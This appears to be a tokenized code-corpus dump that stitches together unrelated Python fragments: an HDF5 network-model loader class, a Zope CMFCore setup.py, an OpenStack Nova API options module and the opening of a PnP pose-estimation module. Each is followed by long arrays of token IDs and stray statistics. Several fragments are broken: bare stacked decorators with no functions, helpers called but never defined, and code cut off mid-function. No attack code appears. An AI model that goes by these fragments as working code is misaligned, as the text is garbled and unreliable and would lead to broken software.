# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
import h5py
import pandas as pd
import numpy as np
from . import utils
from .population import NodePopulation, EdgePopulation
from .types_table import NodeTypesTable, EdgeTypesTable
class FileRoot(object):
"""Base class for both /nodes and /edges root group in h5 file"""
def __init__(self, root_name, h5_files, h5_mode, csv_files):
"""
:param root_name: should either be 'nodes' or 'edges'
:param h5_files: file (or list of files) containing nodes/edges
:param h5_mode: currently only supporting 'r' mode in h5py
:param csv_files: file (or list of files) containing node/edge types
"""
self._root_name = root_name
self._h5_handles = [utils.load_h5(f, h5_mode) for f in utils.listify(h5_files)]
self._csv_handles = [(f, utils.load_csv(f)) for f in utils.listify(csv_files)]
# merge and create a table of the types table(s)
self._types_table = None
self._build_types_table()
# population_name->h5py.Group table (won't instantiate the population)
self._populations_groups = {}
self._store_groups()
# A map between population_name -> Population object. Population objects aren't created until called, in the
# case user wants to split populations among MPI nodes (instantiation will create node/edge indicies and other
# overhead).
self._populations_cache = {}
self.check_format()
@property
@property
@property
@property
@types_table.setter
def _store_groups(self):
"""Create a map between group population to their h5py.Group handle"""
for h5handle in self._h5_handles:
assert(self.root_name in h5handle.keys())
for pop_name, pop_group in h5handle[self._root_name].items():
if pop_name in self._populations_groups:
raise Exception('Multiple {} populations with name {}.'.format(self._root_name, pop_name))
self._populations_groups[pop_name] = pop_group
def get_population(self, population_name, default=None):
"""Return a population group object based on population's name"""
if population_name in self:
return self[population_name]
else:
# need this for EdgeRoot.get_populations
return default
| [
2,
15069,
2177,
13,
9659,
5136,
13,
1439,
2489,
10395,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
17613,
11,
389,
10431,
2810,
326,
262,
198,
2,
1708,
3403,
389,
1138,
25,
198,
2,
198,
2,
352,
13,
2297,
396,
2455,
507,
286,
2723,
2438,
1276,
12377,
262,
2029,
6634,
4003,
11,
428,
1351,
286,
3403,
290,
262,
1708,
198,
2,
37592,
13,
198,
2,
198,
2,
362,
13,
2297,
396,
2455,
507,
287,
13934,
1296,
1276,
22919,
262,
2029,
6634,
4003,
11,
428,
1351,
286,
3403,
290,
262,
1708,
198,
2,
37592,
287,
262,
10314,
290,
14,
273,
584,
5696,
2810,
351,
262,
6082,
13,
198,
2,
198,
2,
513,
13,
16126,
262,
1438,
286,
262,
6634,
15762,
4249,
262,
3891,
286,
663,
20420,
743,
307,
973,
284,
11438,
393,
7719,
198,
2,
3186,
10944,
422,
428,
3788,
1231,
2176,
3161,
3194,
7170,
13,
198,
2,
198,
2,
12680,
47466,
3180,
36592,
2389,
1961,
11050,
3336,
27975,
38162,
9947,
367,
15173,
4877,
5357,
27342,
9865,
3843,
20673,
366,
1921,
3180,
1,
5357,
15529,
7788,
32761,
6375,
8959,
49094,
34764,
11015,
11,
198,
2,
47783,
2751,
11,
21728,
5626,
40880,
5390,
11,
3336,
8959,
49094,
34764,
11015,
3963,
34482,
3398,
1565,
5603,
25382,
5357,
376,
46144,
7473,
317,
16652,
2149,
37232,
33079,
48933,
15986,
198,
2,
13954,
48778,
1961,
13,
3268,
8005,
49261,
50163,
3336,
27975,
38162,
9947,
49707,
14418,
6375,
27342,
9865,
3843,
20673,
9348,
43031,
19146,
7473,
15529,
42242,
11,
3268,
17931,
23988,
11,
19387,
25256,
1847,
11,
198,
2,
38846,
11,
7788,
3620,
6489,
13153,
11,
6375,
7102,
5188,
10917,
3525,
12576,
29506,
25552,
357,
1268,
39149,
2751,
11,
21728,
5626,
40880,
5390,
11,
41755,
11335,
10979,
3963,
28932,
2257,
2043,
37780,
21090,
50,
6375,
198,
2,
49254,
26,
406,
18420,
3963,
23210,
11,
42865,
11,
6375,
4810,
19238,
29722,
26,
6375,
43949,
44180,
23255,
49,
8577,
24131,
8,
29630,
36,
5959,
7257,
2937,
1961,
5357,
6177,
15529,
3336,
15513,
3963,
43031,
25382,
11,
198,
2,
7655,
2767,
16879,
3268,
27342,
10659,
11,
19269,
18379,
43031,
25382,
11,
6375,
309,
9863,
357,
1268,
39149,
2751,
399,
7156,
43,
3528,
18310,
6375,
25401,
54,
24352,
8,
5923,
1797,
2751,
3268,
15529,
34882,
16289,
3963,
3336,
23210,
198,
2,
3963,
12680,
47466,
11,
45886,
16876,
5984,
29817,
1961,
3963,
3336,
28069,
11584,
25382,
3963,
13558,
3398,
29506,
11879,
13,
198,
2,
198,
11748,
28686,
198,
11748,
25064,
198,
198,
11748,
289,
20,
9078,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
764,
1330,
3384,
4487,
198,
6738,
764,
39748,
1330,
19081,
45251,
11,
13113,
45251,
198,
6738,
764,
19199,
62,
11487,
1330,
19081,
31431,
10962,
11,
13113,
31431,
10962,
628,
198,
4871,
9220,
30016,
7,
15252,
2599,
198,
220,
220,
220,
37227,
14881,
1398,
329,
1111,
1220,
77,
4147,
290,
1220,
276,
3212,
6808,
1448,
287,
289,
20,
2393,
37811,
198,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
6808,
62,
3672,
11,
289,
20,
62,
16624,
11,
289,
20,
62,
14171,
11,
269,
21370,
62,
16624,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
6808,
62,
3672,
25,
815,
2035,
307,
705,
77,
4147,
6,
393,
705,
276,
3212,
6,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
289,
20,
62,
16624,
25,
2393,
357,
273,
1351,
286,
3696,
8,
7268,
13760,
14,
276,
3212,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
289,
20,
62,
14171,
25,
3058,
691,
6493,
705,
81,
6,
4235,
287,
289,
20,
9078,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
269,
21370,
62,
16624,
25,
2393,
357,
273,
1351,
286,
3696,
8,
7268,
10139,
14,
14907,
3858,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
15763,
62,
3672,
796,
6808,
62,
3672,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
71,
20,
62,
4993,
829,
796,
685,
26791,
13,
2220,
62,
71,
20,
7,
69,
11,
289,
20,
62,
14171,
8,
329,
277,
287,
3384,
4487,
13,
4868,
1958,
7,
71,
20,
62,
16624,
15437,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
40664,
62,
4993,
829,
796,
47527,
69,
11,
3384,
4487,
13,
2220,
62,
40664,
7,
69,
4008,
329,
277,
287,
3384,
4487,
13,
4868,
1958,
7,
40664,
62,
16624,
15437,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
20121,
290,
2251,
257,
3084,
286,
262,
3858,
3084,
7,
82,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
19199,
62,
11487,
796,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
11249,
62,
19199,
62,
11487,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
3265,
62,
3672,
3784,
71,
20,
9078,
13,
13247,
3084,
357,
26502,
470,
9113,
9386,
262,
3265,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
12924,
5768,
62,
24432,
796,
23884,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
8095,
62,
24432,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
317,
3975,
1022,
3265,
62,
3672,
4613,
20133,
2134,
13,
20133,
5563,
3588,
470,
2727,
1566,
1444,
11,
287,
262,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1339,
2836,
3382,
284,
6626,
9684,
1871,
4904,
40,
13760,
357,
8625,
415,
3920,
481,
2251,
10139,
14,
14907,
2699,
444,
290,
584,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16965,
737,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
12924,
5768,
62,
23870,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
9122,
62,
18982,
3419,
628,
220,
220,
220,
2488,
26745,
628,
220,
220,
220,
2488,
26745,
628,
220,
220,
220,
2488,
26745,
628,
220,
220,
220,
2488,
26745,
628,
220,
220,
220,
2488,
19199,
62,
11487,
13,
2617,
353,
628,
220,
220,
220,
825,
4808,
8095,
62,
24432,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16447,
257,
3975,
1022,
1448,
3265,
284,
511,
289,
20,
9078,
13,
13247,
5412,
37811,
198,
220,
220,
220,
220,
220,
220,
220,
329,
289,
20,
28144,
287,
2116,
13557,
71,
20,
62,
4993,
829,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
7,
944,
13,
15763,
62,
3672,
287,
289,
20,
28144,
13,
13083,
28955,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1461,
62,
3672,
11,
1461,
62,
8094,
287,
289,
20,
28144,
58,
944,
13557,
15763,
62,
3672,
4083,
23814,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1461,
62,
3672,
287,
2116,
13557,
12924,
5768,
62,
24432,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
10786,
31217,
23884,
9684,
351,
1438,
23884,
2637,
13,
18982,
7,
944,
13557,
15763,
62,
3672,
11,
1461,
62,
3672,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
12924,
5768,
62,
24432,
58,
12924,
62,
3672,
60,
796,
1461,
62,
8094,
628,
220,
220,
220,
825,
651,
62,
39748,
7,
944,
11,
3265,
62,
3672,
11,
4277,
28,
14202,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
257,
3265,
1448,
2134,
1912,
319,
3265,
338,
1438,
37811,
198,
220,
220,
220,
220,
220,
220,
220,
611,
3265,
62,
3672,
287,
2116,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
58,
39748,
62,
3672,
60,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
761,
428,
329,
13113,
30016,
13,
1136,
62,
12924,
5768,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
4277,
628,
198
] | 2.930128 | 1,331 |
import os
from setuptools import setup
from setuptools import find_packages
NAME = 'CMFCore'
here = os.path.abspath(os.path.dirname(__file__))
package = os.path.join(here, 'Products', NAME)
_boundary = '\n' + ('-' * 60) + '\n\n'
README = _boundary.join([
_package_doc('README.txt'),
_package_doc('CHANGES.txt'),
])
setup(name='Products.%s' % NAME,
version='2.4.0b5.dev0',
description='Zope Content Management Framework core components',
long_description=README,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Plone",
"Framework :: Zope :: 4",
"Intended Audience :: Developers",
"License :: OSI Approved :: Zope Public License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Software Development :: Libraries :: Application Frameworks", # noqa
],
keywords='web application server zope cmf',
author="Zope Foundation and Contributors",
author_email="[email protected]",
url="https://github.com/zopefoundation/Products.CMFCore",
license="ZPL 2.1",
packages=find_packages(),
include_package_data=True,
namespace_packages=['Products'],
zip_safe=False,
setup_requires=[
'eggtestinfo',
],
install_requires=[
'setuptools',
'Zope >= 4.0b4',
'docutils',
'five.localsitemanager',
'Products.BTreeFolder2',
'Products.GenericSetup >= 2.0b1',
'Products.MailHost >= 4.0',
'Products.PythonScripts',
'Products.StandardCacheManagers',
'Products.ZCTextIndex',
'six',
],
tests_require=[
'zope.testing >= 3.7.0',
'Products.StandardCacheManagers',
],
extras_require={
'test': ['Products.StandardCacheManagers'],
'zsql': ['Products.ZSQLMethods >= 3.0.0b1'],
},
test_loader='zope.testing.testrunner.eggsupport:SkipLayers',
test_suite='Products.%s' % NAME,
entry_points="""
[zope2.initialize]
Products.%s = Products.%s:initialize
[distutils.commands]
ftest = zope.testing.testrunner.eggsupport:ftest
""" % (NAME, NAME),
)
| [
11748,
28686,
198,
6738,
900,
37623,
10141,
1330,
9058,
198,
6738,
900,
37623,
10141,
1330,
1064,
62,
43789,
198,
198,
20608,
796,
705,
24187,
4851,
382,
6,
198,
198,
1456,
796,
28686,
13,
6978,
13,
397,
2777,
776,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
4008,
198,
26495,
796,
28686,
13,
6978,
13,
22179,
7,
1456,
11,
705,
48650,
3256,
36751,
8,
628,
198,
198,
62,
7784,
560,
796,
705,
59,
77,
6,
1343,
19203,
19355,
1635,
3126,
8,
1343,
705,
59,
77,
59,
77,
6,
198,
15675,
11682,
796,
4808,
7784,
560,
13,
22179,
26933,
198,
220,
220,
220,
4808,
26495,
62,
15390,
10786,
15675,
11682,
13,
14116,
33809,
198,
220,
220,
220,
4808,
26495,
62,
15390,
10786,
3398,
15567,
1546,
13,
14116,
33809,
198,
12962,
198,
198,
40406,
7,
3672,
11639,
48650,
13,
4,
82,
6,
4064,
36751,
11,
198,
220,
220,
220,
220,
220,
2196,
11639,
17,
13,
19,
13,
15,
65,
20,
13,
7959,
15,
3256,
198,
220,
220,
220,
220,
220,
6764,
11639,
57,
3008,
14041,
8549,
25161,
4755,
6805,
3256,
198,
220,
220,
220,
220,
220,
890,
62,
11213,
28,
15675,
11682,
11,
198,
220,
220,
220,
220,
220,
1398,
13350,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
41206,
12678,
7904,
604,
532,
17993,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
21055,
6433,
7904,
1345,
505,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
21055,
6433,
7904,
1168,
3008,
7904,
604,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
5317,
1631,
7591,
1240,
7904,
34152,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34156,
7904,
7294,
40,
20010,
1079,
7904,
1168,
3008,
5094,
13789,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
362,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
362,
13,
22,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
21,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15167,
2229,
15417,
7904,
11361,
7904,
46333,
7904,
16932,
7535,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
33221,
7904,
10442,
7712,
7904,
46267,
7904,
15678,
15183,
19653,
1600,
220,
1303,
645,
20402,
198,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
26286,
11639,
12384,
3586,
4382,
1976,
3008,
12067,
69,
3256,
198,
220,
220,
220,
220,
220,
1772,
2625,
57,
3008,
5693,
290,
25767,
669,
1600,
198,
220,
220,
220,
220,
220,
1772,
62,
12888,
2625,
89,
3008,
12,
11215,
69,
31,
89,
3008,
13,
2398,
1600,
198,
220,
220,
220,
220,
220,
19016,
2625,
5450,
1378,
12567,
13,
785,
14,
89,
404,
891,
633,
341,
14,
48650,
13,
24187,
4851,
382,
1600,
198,
220,
220,
220,
220,
220,
5964,
2625,
57,
6489,
362,
13,
16,
1600,
198,
220,
220,
220,
220,
220,
10392,
28,
19796,
62,
43789,
22784,
198,
220,
220,
220,
220,
220,
2291,
62,
26495,
62,
7890,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
25745,
62,
43789,
28,
17816,
48650,
6,
4357,
198,
220,
220,
220,
220,
220,
19974,
62,
21230,
28,
25101,
11,
198,
220,
220,
220,
220,
220,
9058,
62,
47911,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
33856,
9288,
10951,
3256,
198,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
2721,
62,
47911,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2617,
37623,
10141,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
57,
3008,
18189,
604,
13,
15,
65,
19,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
15390,
26791,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
13261,
13,
17946,
874,
270,
8463,
3536,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
19313,
631,
41092,
17,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
46189,
40786,
18189,
362,
13,
15,
65,
16,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
25804,
17932,
18189,
604,
13,
15,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
37906,
7391,
82,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
23615,
30562,
5124,
10321,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
57,
4177,
2302,
15732,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
19412,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
5254,
62,
46115,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
89,
3008,
13,
33407,
18189,
513,
13,
22,
13,
15,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
48650,
13,
23615,
30562,
5124,
10321,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
33849,
62,
46115,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
9288,
10354,
37250,
48650,
13,
23615,
30562,
5124,
10321,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
89,
25410,
10354,
37250,
48650,
13,
57,
17861,
46202,
18189,
513,
13,
15,
13,
15,
65,
16,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8964,
198,
220,
220,
220,
220,
220,
1332,
62,
29356,
11639,
89,
3008,
13,
33407,
13,
9288,
16737,
13,
33856,
11284,
25,
50232,
43,
6962,
3256,
198,
220,
220,
220,
220,
220,
1332,
62,
2385,
578,
11639,
48650,
13,
4,
82,
6,
4064,
36751,
11,
198,
220,
220,
220,
220,
220,
5726,
62,
13033,
2625,
15931,
198,
220,
220,
220,
220,
220,
685,
89,
3008,
17,
13,
36733,
1096,
60,
198,
220,
220,
220,
220,
220,
18675,
13,
4,
82,
796,
18675,
13,
4,
82,
25,
36733,
1096,
198,
220,
220,
220,
220,
220,
685,
17080,
26791,
13,
9503,
1746,
60,
198,
220,
220,
220,
220,
220,
277,
9288,
796,
1976,
3008,
13,
33407,
13,
9288,
16737,
13,
33856,
11284,
25,
701,
395,
198,
220,
220,
220,
220,
220,
37227,
4064,
357,
20608,
11,
36751,
828,
198,
220,
220,
220,
220,
220,
1267,
198
] | 2.257806 | 1,121 |
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
api_opts = [
cfg.ListOpt("extensions_blacklist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a list of all of the v2.1 API extensions to never load. However,
it will be removed in the near future, after which the all the functionality
that was previously in extensions will be part of the standard API, and thus
always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you do not
wish to load.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_whitelist
"""),
cfg.ListOpt("extensions_whitelist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This is a list of extensions. If it is empty, then *all* extensions except
those specified in the extensions_blacklist option will be loaded. If it is not
empty, then only those extensions in this list will be loaded, provided that
they are also not in the extensions_blacklist option. Once this deprecated
option is removed, after which the all the functionality that was previously in
extensions will be part of the standard API, and thus always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you wish to
load, or an empty list, which indicates that all extensions are to be run.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_blacklist
"""),
cfg.StrOpt("project_id_regex",
default=None,
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a string representing a regular expression (regex) that matches
the project_id as contained in URLs. If not set, it will match normal UUIDs
created by keystone.
* Possible values:
A string representing any legal regular expression
* Services that use this:
``nova-api``
* Related options:
None
"""),
]
api_opts_group = cfg.OptGroup(name="osapi_v21", title="API v2.1 Options")
| [
2,
15069,
1853,
4946,
25896,
5693,
198,
2,
1439,
6923,
33876,
13,
198,
2,
198,
2,
220,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
345,
743,
198,
2,
220,
220,
220,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
921,
743,
7330,
198,
2,
220,
220,
220,
257,
4866,
286,
262,
13789,
379,
198,
2,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
220,
220,
220,
17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
220,
220,
220,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
42881,
198,
2,
220,
220,
220,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
4091,
262,
198,
2,
220,
220,
220,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
11247,
198,
2,
220,
220,
220,
739,
262,
13789,
13,
198,
198,
6738,
28686,
5439,
62,
11250,
1330,
30218,
70,
628,
198,
15042,
62,
404,
912,
796,
685,
198,
220,
220,
220,
30218,
70,
13,
8053,
27871,
7203,
2302,
5736,
62,
13424,
4868,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
41888,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
1640,
62,
2787,
8325,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
8094,
2625,
418,
15042,
62,
85,
2481,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
15931,
198,
9,
46162,
38827,
11617,
9,
198,
198,
1212,
3038,
318,
257,
1351,
286,
477,
286,
262,
410,
17,
13,
16,
7824,
18366,
284,
1239,
3440,
13,
2102,
11,
198,
270,
481,
307,
4615,
287,
262,
1474,
2003,
11,
706,
543,
262,
477,
262,
11244,
198,
5562,
373,
4271,
287,
18366,
481,
307,
636,
286,
262,
3210,
7824,
11,
290,
4145,
198,
33770,
9857,
13,
198,
198,
9,
33671,
3815,
25,
628,
220,
220,
220,
317,
1351,
286,
13042,
11,
1123,
852,
262,
16144,
286,
281,
7552,
326,
345,
466,
407,
198,
220,
220,
220,
4601,
284,
3440,
13,
198,
198,
9,
6168,
326,
779,
428,
25,
628,
220,
220,
220,
7559,
38438,
12,
15042,
15506,
198,
198,
9,
19809,
3689,
25,
628,
220,
220,
220,
9343,
11,
18366,
62,
1929,
270,
46331,
198,
15931,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
30218,
70,
13,
8053,
27871,
7203,
2302,
5736,
62,
1929,
270,
46331,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
41888,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
1640,
62,
2787,
8325,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
8094,
2625,
418,
15042,
62,
85,
2481,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
15931,
198,
9,
46162,
38827,
11617,
9,
198,
198,
1212,
318,
257,
1351,
286,
18366,
13,
1002,
340,
318,
6565,
11,
788,
1635,
439,
9,
18366,
2845,
198,
25591,
7368,
287,
262,
18366,
62,
13424,
4868,
3038,
481,
307,
9639,
13,
1002,
340,
318,
407,
198,
28920,
11,
788,
691,
883,
18366,
287,
428,
1351,
481,
307,
9639,
11,
2810,
326,
198,
9930,
389,
635,
407,
287,
262,
18366,
62,
13424,
4868,
3038,
13,
4874,
428,
39224,
198,
18076,
318,
4615,
11,
706,
543,
262,
477,
262,
11244,
326,
373,
4271,
287,
198,
2302,
5736,
481,
307,
636,
286,
262,
3210,
7824,
11,
290,
4145,
1464,
9857,
13,
198,
198,
9,
33671,
3815,
25,
628,
220,
220,
220,
317,
1351,
286,
13042,
11,
1123,
852,
262,
16144,
286,
281,
7552,
326,
345,
4601,
284,
198,
220,
220,
220,
3440,
11,
393,
281,
6565,
1351,
11,
543,
9217,
326,
477,
18366,
389,
284,
307,
1057,
13,
198,
198,
9,
6168,
326,
779,
428,
25,
628,
220,
220,
220,
7559,
38438,
12,
15042,
15506,
198,
198,
9,
19809,
3689,
25,
628,
220,
220,
220,
9343,
11,
18366,
62,
13424,
4868,
198,
15931,
12340,
198,
220,
220,
220,
220,
220,
220,
220,
30218,
70,
13,
13290,
27871,
7203,
16302,
62,
312,
62,
260,
25636,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
1640,
62,
2787,
8325,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
39224,
62,
8094,
2625,
418,
15042,
62,
85,
2481,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
15931,
198,
9,
46162,
38827,
11617,
9,
198,
198,
1212,
3038,
318,
257,
4731,
10200,
257,
3218,
5408,
357,
260,
25636,
8,
326,
7466,
198,
1169,
1628,
62,
312,
355,
7763,
287,
32336,
13,
1002,
407,
900,
11,
340,
481,
2872,
3487,
471,
27586,
82,
198,
25598,
416,
1994,
6440,
13,
198,
198,
9,
33671,
3815,
25,
628,
220,
220,
220,
317,
4731,
10200,
597,
2742,
3218,
5408,
198,
198,
9,
6168,
326,
779,
428,
25,
628,
220,
220,
220,
7559,
38438,
12,
15042,
15506,
198,
198,
9,
19809,
3689,
25,
628,
220,
220,
220,
6045,
198,
15931,
12340,
198,
60,
198,
198,
15042,
62,
404,
912,
62,
8094,
796,
30218,
70,
13,
27871,
13247,
7,
3672,
2625,
418,
15042,
62,
85,
2481,
1600,
3670,
2625,
17614,
410,
17,
13,
16,
18634,
4943,
628,
198
] | 3.047974 | 938 |
"""Summary
"""
import numpy as np
import LinearPnP as LPnP
import random
from tqdm import tqdm
def proj3Dto2D(x3D, K, C, R):
"""Summary
Args:
x3D (TYPE): Description
K (TYPE): Description
C (TYPE): Description
R (TYPE): Description
Returns:
TYPE: Description
"""
C = C.reshape(-1, 1)
x3D = x3D.reshape(-1, 1)
